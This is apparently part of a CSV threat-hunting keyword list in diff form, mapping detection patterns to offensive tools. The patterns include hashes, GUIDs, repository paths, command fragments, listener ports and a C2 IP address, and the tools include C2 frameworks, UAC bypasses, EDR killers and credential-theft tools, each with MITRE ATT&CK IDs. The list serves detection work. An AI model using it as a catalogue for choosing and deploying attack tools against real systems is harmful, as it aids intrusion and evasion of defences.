+"*0.0.0.0:4444*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*0.0.0.0:4445*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z"
+"*0.0.0.0:53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","1","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
+"*00_create_all_modules_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z"
+"*00000000000000000043d43d00043de2a97eabb398317329f027c66e4c1b01*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary 
emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*0041d09d62db1cfe06bcb45c6b007af3b6d8c6cb419948e49141188f453a329b*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*01_all_exploits_have_payloads_test*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*02238b1720b8514de36ae80fa3d07c377d22e6befe99a7b87d4da9d60d23be02*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0472A393-9503-491D-B6DA-FA47CD567EDE*","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","0","N/A","9","2","152","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" +"*04845492-BD9E-4EC6-ACA4-4A0A460B3508*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*04b99fb5cc1d91b1752fbcb2446db71083ab87af59dd9e0d940cc2ed5a65ef49*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*04ca7e137e1e9feead96a7df45bb67d5ab3de190*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","0","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*04DFB6E4-809E-4C35-88A1-2CC5F1EBFEBD*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*04FC654C-D89A-44F9-9E34-6D95CE152E9D*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*05a2c8c165e431e852c4bcafbfccb27b9e8c0428d2c975ceef94c98639f1c7d8*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*07DFC5AA-5B1F-4CCC-A3D3-816ECCBB6CB6*","offensive_tool_keyword","SharpBlackout","Terminate AV/EDR leveraging BYOVD attack","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/dmcxblue/SharpBlackout","1","0","N/A","10","1","68","16","2023-08-23T14:44:25Z","2023-08-23T14:16:40Z" +"*07EF7652-1C2D-478B-BB4B-F9560695A387*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*08384f3f05ad85b2aa935dbd2e46a053cb0001b28bbe593dde2a8c4b822c2a7d*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - 
TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*086e302c10b4dc16180cdb87a84844a9b49b633ea6e965ad0db2319adb2af86e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*08AEC00F-42ED-4E62-AE8D-0BFCE30A3F57*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*09323E4D-BE0F-452A-9CA8-B07D2CFA9804*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"*0971A047-A45A-43F4-B7D8-16AC1114B524*","offensive_tool_keyword","BackupOperatorToDA","From an account member of the group Backup Operators to Domain Admin without RDP or WinRM on the Domain Controller","T1078 - T1078.003 - T1021 - T1021.006 - T1112 - T1003.003","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/mpgn/BackupOperatorToDA","1","0","N/A","10","4","335","48","2022-10-05T07:29:46Z","2022-02-15T20:51:46Z" +"*0A1C2C46-33F7-4D4C-B8C6-1FC9B116A6DF*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense 
Evasion","https://github.com/ShorSec/DllNotificationInjection","1","0","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z" +"*0ac82760-3e0d-4124-bd1c-92c8dab97171*","offensive_tool_keyword","PowerSCCM","PowerSCCM - PowerShell module to interact with SCCM deployments","T1059.001 - T1018 - T1072 - T1047","TA0005 - TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSCCM","1","0","N/A","8","4","301","110","2022-01-22T15:30:56Z","2016-01-28T00:20:22Z" +"*0B6D8B01-861E-4CAF-B1C9-6670884381DB*","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/openbullet","1","0","N/A","10","10","1342","714","2023-02-24T16:29:01Z","2019-03-26T09:06:32Z" +"*0c6faff9d363f76f723c52ae8796bf7d37913c7117eaaeb9416728ca958975d4*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0D17A4B4-A7C4-49C0-99E3-B856F9F3B271*","offensive_tool_keyword","mhydeath","Abusing mhyprotect to kill AVs / EDRs / XDRs / Protected Processes.","T1562.001","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/zer0condition/mhydeath","1","0","N/A","10","3","253","47","2023-08-22T08:01:04Z","2023-08-22T07:15:36Z" +"*0d1n * --post * --payloads *","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A",,"N/A",,, +"*0d1n --host*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","0","N/A","N/A",,"N/A",,, +"*0d1n*kill_listener.sh*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*0da59496e173b30d19c4f6c3ca62f2be8ef5b5e790c4952ac0d27f987577488f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*0DD419E5-D7B3-4360-874E-5838A7519355*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*0evilpwfilter*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" 
+"*0evilpwfilter.dll*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*0fa31c8c34a370931d8ffe8097e998f778db63e2e036fbd7727a71a0dcf5d28c*","offensive_tool_keyword","responder","LLMNR. NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011","TA0011 - TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/SpiderLabs/Responder","1","0","N/A","N/A","10","4199","1633","2020-06-15T18:07:44Z","2012-10-24T14:35:12Z"
+"*0vercl0k/udmp-parser*","offensive_tool_keyword","udmp-parser","A Cross-Platform C++ parser library for Windows user minidumps.","T1005 - T1059.003 - T1027.002","TA0009 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/0vercl0k/udmp-parser","1","1","N/A","6","2","160","22","2023-08-27T18:30:24Z","2022-01-30T18:56:21Z"
+"*0x00-0x00*","offensive_tool_keyword","Github Username","Github pentester username with lots of different exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/0x00-0x00","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*0x09AL/DNS-Persist*","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","1","N/A","10","10","211","75","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z"
+"*0x09AL/IIS-Raid*","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","1","N/A","10","10","510","127","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z"
+"*0x9999997B3deF7b69c09D7a9CA65E5242fb04a764*","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","586","223","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z"
+"*0xbadjuju/Tokenvator*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z"
+"*0xbadjuju/WheresMyImplant*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
+"*0xdarkvortex-MalwareDevelopment*","offensive_tool_keyword","prometheus","malware C2","T1071 - T1071.001 - T1105 - T1105.002 - T1106 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/paranoidninja/0xdarkvortex-MalwareDevelopment","1","1","N/A","10","10","176","63","2020-07-21T06:14:44Z","2018-09-04T15:38:53Z"
+"*0xdeadbeef*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/timwr/CVE-2016-5195","1","1","N/A","N/A","10","935","404","2021-02-03T16:03:40Z","2016-10-21T11:19:21Z"
+"*0xsp-SRD/mortar*","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","N/A","10","1181","193","2022-08-03T03:38:57Z","2021-11-25T16:49:47Z"
+"*0xthirteen/MoveKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","10","7","616","114","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z"
+"*0xthirteen/PerfExec*","offensive_tool_keyword","PerfExec","PerfExec - an example performance dll that will run CMD.exe and a .NET assembly that will execute the DLL or gather performance data locally or remotely.","T1055.001 - T1059.001 - T1059.003 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/PerfExec","1","1","N/A","7","1","73","8","2023-08-02T20:53:24Z","2023-07-11T16:43:47Z"
+"*0xthirteen/SharpRDP*","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","1","N/A","10","9","873","517","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z"
+"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Persistence","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0xthirteen/StayKit","1","1","N/A","10","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
+"*0xthirteen/StayKit*","offensive_tool_keyword","cobaltstrike","StayKit is an extension for Cobalt Strike persistence by leveraging the execute_assembly function with the SharpStay .NET assembly. The aggressor script handles payload creation by reading the template files for a specific execution type.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Persistence","https://github.com/0xthirteen/StayKit","1","1","N/A","N/A","10","449","81","2020-01-27T14:53:31Z","2020-01-24T22:20:20Z"
+"*1_FindDomain.sh*","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z"
+"*105C2C6D-1C0A-4535-A231-80E355EFB112*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z"
+"*10979d6665292065b840f8d95366201a686146e949908cdd41331699b331ab9c*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*10b06fce5935839c3978cd7fe130355be750cfa03986adff5c33bd9f7922871e*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*10f5885eb8ecc5ecbbea6717ba163761b34a416c7beff36276e7b590f39161b9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*10k-worst-pass.txt*","offensive_tool_keyword","AD exploitation cheat sheet","Crack with TGSRepCrack","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*11385CC1-54B7-4968-9052-DF8BB1961F1E*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*119.45.104.153:8848*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z"
+"*12372473c8b8cc25108b254a5ed994ee3895687236f8ad062006c1d8f6916475*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*123abcbde966780cef8d9ec24523acac*","offensive_tool_keyword","NimExec","Fileless Command Execution for Lateral Movement in Nim","T1021.006 - T1059.005 - T1564.001","TA0008 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/frkngksl/NimExec","1","0","N/A","N/A","4","307","33","2023-06-23T11:07:20Z","2023-04-21T19:46:53Z"
+"*124e6ada27ffbe0ff97f51eb9d7caaf86b531bcff90ed5a075ff89b45b00cba5*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z"
+"*127.0.0.1 is not advisable as a source. Use -l 127.0.0.1 to override this warning*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
+"*127.0.0.1:1080*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","0","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z"
+"*127.0.0.1:1337*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z"
